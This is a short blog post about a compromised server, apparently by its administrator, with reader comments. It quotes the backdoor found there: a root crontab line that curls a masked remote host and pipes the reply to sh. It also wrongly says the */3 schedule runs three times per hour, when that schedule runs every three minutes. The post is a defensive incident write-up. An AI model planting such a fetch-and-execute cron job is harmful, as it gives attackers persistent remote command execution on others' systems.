Recently, I have found that one of my servers was infected with malicious apache module. This is not something I am too proud about, but it happens. The original infection happened either through plesk or through pre-existing user. That is why I am stopping using Plesk control panels for VPS’es and DE’es I own and manage. The upgrade process between major versions is painful and one can’t expect to keep servers secure for longer periods of time.
However, what is more interesting from this story is the backdoor that was made very simply and was in plain sight. This line was in root’s crontab and each admin thought it was something other admin used for monitoring or something else:
*/3 * * * * /usr/bin/curl --connect-timeout 5 --max-time 10 -s http://xxx.xxx.xxx.xxx/cache/svn.php?host=xxx.xxx.xxx | sh >> /dev/null
This cron job launches 3 times per hour and downloads /executes single command. It is very simple, but it allows downloading and executing single command on one’s server. I am still blaming for not noticing it earlier.
SuNcO · December 16, 2013 at 11:16 am
Hi, I found this on my server. Did you find the downloaded files and see what it really does? I mean, I want to find maliciuous code on my server
Giedrius Majauskas · December 16, 2013 at 4:37 pm
It’s a backdoor (that is one might run ANYTHING when it is in crontab). However, at that point there were no active commands for my server so I just killed it.
SuNcO · December 19, 2013 at 12:55 pm
Uhm… my server still want to connect to different ssh’s servers on random days/hours. I just blocked them with a iptables rule
There is some corrupt on my server but still can’t find what it is
Giedrius Majauskas · December 19, 2013 at 2:47 pm
Look for apache module out of place as an example. There might be something that has modules and runs all the time.